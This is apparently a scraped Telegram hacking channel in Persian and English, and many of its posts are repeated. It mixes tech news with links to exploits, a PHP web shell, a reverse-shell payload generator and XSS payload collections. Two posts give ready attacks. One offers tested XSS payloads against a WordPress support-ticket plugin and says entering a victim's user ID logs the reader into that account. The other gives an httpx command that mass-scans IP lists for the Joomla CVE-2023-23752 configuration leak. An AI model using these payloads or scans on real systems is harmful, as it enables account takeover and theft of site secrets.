0Day.Today | Learn Exploit | Zero World | Dark web |
اگر از VMware استفاده میکنید، این موج جدید حملات باج افزاری به سرورهای ESXi بانام ESXiArgs روجدی بگیرید! تنها در فرانسه ۲۵۰۰ سرور بااستفاده از یک آسیب پذیری شناخته شده هک شدند و چندین ارائه دهنده سرویسهای ابری هم قربانی شدند. از سال ۲۰۲۱ یک exploit این باگ…
ESXiArgs Recover - A tool to recover from ESXiArgs ransomware
Github
#VMware #ESXiArgs #ransomware
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#VMware #ESXiArgs #ransomware
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
C99 Shell
PHP 7 and safe-build Update of the popular C99 variant of PHP Shell
Github
#Shell #c99
——————
0Day.Today
@LearnExploit
@Tech_Army
PHP 7 and safe-build Update of the popular C99 variant of PHP Shell
Github
#Shell #c99
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝4⚡2👍1
👍4
تلگرام دیگر از خواستهای پیامکی در تلگرام های غیر رسمی پشتیبانی نخواهد کرد.
طبق پیامی که تلگرام برای توسعه دهندگان برنامه های غیر رسمی ارسال کرده است، تلگرام قصد دارد پشتیبانی از درخواست های پیامک از برنامه های شخص ثالث را متوقف کند، به این معنی که کاربران می توانند تأیید پیامک را فقط از برنامه های رسمی تلگرام درخواست کنند.
این تغییر قرار است در 18 فوریه اعمال شود. پس از آن تاریخ، کدهای فعال سازی برای برنامه های شخص ثالث فقط از طریق برنامه های رسمی تلگرام قابل دریافت هستند.
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
طبق پیامی که تلگرام برای توسعه دهندگان برنامه های غیر رسمی ارسال کرده است، تلگرام قصد دارد پشتیبانی از درخواست های پیامک از برنامه های شخص ثالث را متوقف کند، به این معنی که کاربران می توانند تأیید پیامک را فقط از برنامه های رسمی تلگرام درخواست کنند.
این تغییر قرار است در 18 فوریه اعمال شود. پس از آن تاریخ، کدهای فعال سازی برای برنامه های شخص ثالث فقط از طریق برنامه های رسمی تلگرام قابل دریافت هستند.
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
👌8🆒4😢3⚡1👍1🤩1
CVE-2022-21587 POC
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (Upload)
Exploit
#POC #CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (Upload)
Exploit
#POC #CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👎1
APKHunt - OWASP MASVS Static Analyzer
Github
#Owasp #Pentest #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Owasp #Pentest #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍4
Media is too big
VIEW IN TELEGRAM
هک صدا و سیما توسط گروه هکری عدالت علی هنگام پخش سخنرانی ابراهیم رئیسی در مراسم حکومتی ۲۲ بهمن، تصاویری را با پیام «پولهایتان را از بانکها بیرون بکشید» و نمایش شعار «مرگ بر خامنهای» و فراخوان «۲۷ بهمن» پخش کرد
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
👎21👍17🫡3🔥2🤯2👌2💯1
قابلیت جدید اینستاگرام که مشابه OnlyFans ولی اخلاقی تر است توسط مهراد هیدن و بهزاد لیتو فعال شد!
شما با پرداخت ماهانه حدود 5 یورو میتوانید از محتوای اختصاصی پست ، استوری و لایو که فالور های عادی نمیتوانند ببینند را تماشا کنید و با این اشتراک میتوانید شانس صحبت در دایرکت با آرتیست را هم بالا ببرید.
#Instagram #news
——————
0Day.Today
@LearnExploit
@Tech_Army
شما با پرداخت ماهانه حدود 5 یورو میتوانید از محتوای اختصاصی پست ، استوری و لایو که فالور های عادی نمیتوانند ببینند را تماشا کنید و با این اشتراک میتوانید شانس صحبت در دایرکت با آرتیست را هم بالا ببرید.
#Instagram #news
——————
0Day.Today
@LearnExploit
@Tech_Army
😁12👍2🆒2👎1🤨1
CVE-2022-23935 ( Python Exploit for CVE-2022-23935 )
Staged Reverse Shell Payload Generator for CVE-2022-23935
Github
#Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Staged Reverse Shell Payload Generator for CVE-2022-23935
Github
#Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5👎1
Tiny XSS Payloads
A collection of tiny XSS Payloads that can be used in different contexts.
Github
#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
A collection of tiny XSS Payloads that can be used in different contexts.
Github
#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝5👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
پیلود تست شده :https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
✍6👍3⚡1
ورود آیفون ممنوع شد .
طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدلهای بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.
وزارت صمت مرجع صادرکننده این ابلاغیه است.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدلهای بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.
وزارت صمت مرجع صادرکننده این ابلاغیه است.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔4👌3🤨3
This media is not supported in your browser
VIEW IN TELEGRAM
LPE via StorSvc
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝2
این آخرین باری هست که اینترنت اکسپلورر رو میبینید، مایکروسافت امروز آپدیتی برای حذفش منتشر میکنه . 🖤
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🫡13😢7👌2❤1👍1👏1🎉1
Unusual 403 Bypass to a full website takeover
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
reNgine 🔥
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4❤🔥1
CVE-2023-23752
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-23752 An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints severity: high 🆘 Github #CVE #Joomla —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-23752 ( PoC )
Joomla webservice endpoint access
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Joomla webservice endpoint access
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3✍2🤝1